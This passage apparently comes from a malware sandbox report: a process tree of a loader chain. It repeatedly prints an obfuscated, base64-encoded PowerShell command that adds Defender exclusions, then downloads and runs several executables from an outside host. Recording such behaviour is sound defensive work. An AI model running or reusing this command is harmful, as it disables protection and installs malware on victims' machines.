GUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdwBzAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAbAB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB0AGoAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB2AHIAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagByAHcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBwAGcAdQAjAD4A"
                                  13⤵
                                    PID:1492
                                    • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
                                      "C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
                                      14⤵
                                      • Suspicious use of SetThreadContext
                                      PID:1516
                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                        15⤵
                                          PID:1936
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAZgBuACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdQB1AHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcgBuAHkAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZQBlAG4AIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwB5AHYAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHYAaQBoACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAZgBxACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwBoAGMAcQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGcAcwB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagBwAG4AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBzAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBqAHYAeAAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBxAHkAbQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAdAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGkAeQBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAGUAaABkACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBiAHgAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAYwBiACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHMAZwBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwB1AHIAZAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB0AGoAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBqAHMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBwAGMAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBxAGkAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagBqAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAeQB5AGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdwBzAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAbAB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB0AGoAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB2AHIAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagByAHcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBwAGcAdQAjAD4A"
                                            16⤵
                                              PID:332
                                              • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
                                                "C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
                                                17⤵
                                                  PID:2244
                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                    18⤵
                                                      PID:2316
                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                      18⤵
                                                        PID:2324
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAZgBuACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdQB1AHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcgBuAHkAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZQBlAG4AIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwB5AHYAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHYAaQBoACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAZgBxACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwBoAGMAcQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGcAcwB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagBwAG4AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBzAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBqAHYAeAAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBxAHkAbQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAdAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGkAeQBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAGUAaABkACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBiAHgAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAYwBiACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHMAZwBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwB1AHIAZAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB0AGoAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBqAHMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBwAGMAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBxAGkAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagBqAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAeQB5AGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdwBzAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAbAB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB0AGoAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB2AHIAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagByAHcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBwAGcAdQAjAD4A"
                                                          19⤵
                                                            PID:2508
                                                            • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
                                                              20⤵
                                                                PID:2904
                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                  21⤵
                                                                    PID:2624
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAZgBuACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdQB1AHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcgBuAHkAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZQBlAG4AIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwB5AHYAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHYAaQBoACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAZgBxACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwBoAGMAcQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGcAcwB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagBwAG4AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBzAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBqAHYAeAAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBxAHkAbQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAdAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGkAeQBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAGUAaABkACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBiAHgAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAYwBiACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHMAZwBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwB1AHIAZAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB0AGoAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBqAHMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBwAGMAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBxAGkAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagBqAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAeQB5AGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdwBzAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAbAB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB0AGoAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB2AHIAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagByAHcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBwAGcAdQAjAD4A"
                                                                      22⤵
                                                                      • Drops file in System32 directory
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:2300
                                                                      • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
                                                                        23⤵
                                                                          PID:2792
                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                            24⤵
                                                                              PID:2076
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAZgBuACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdQB1AHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcgBuAHkAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZQBlAG4AIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwB5AHYAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHYAaQBoACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAZgBxACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwBoAGMAcQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGcAcwB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagBwAG4AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBzAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBqAHYAeAAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBxAHkAbQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAdAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGkAeQBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAGUAaABkACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBiAHgAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAYwBiACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHMAZwBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwB1AHIAZAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB0AGoAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBqAHMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBwAGMAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBxAGkAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagBqAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAeQB5AGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdwBzAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAbAB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB0AGoAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB2AHIAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagByAHcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBwAGcAdQAjAD4A"
                                                                                25⤵
                                                                                  PID:2532
                                                                                  • C:\Users\Admin\AppData\Local\Temp\new2.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\new2.exe"
                                                                                    26⤵
                                                                                      PID:2952
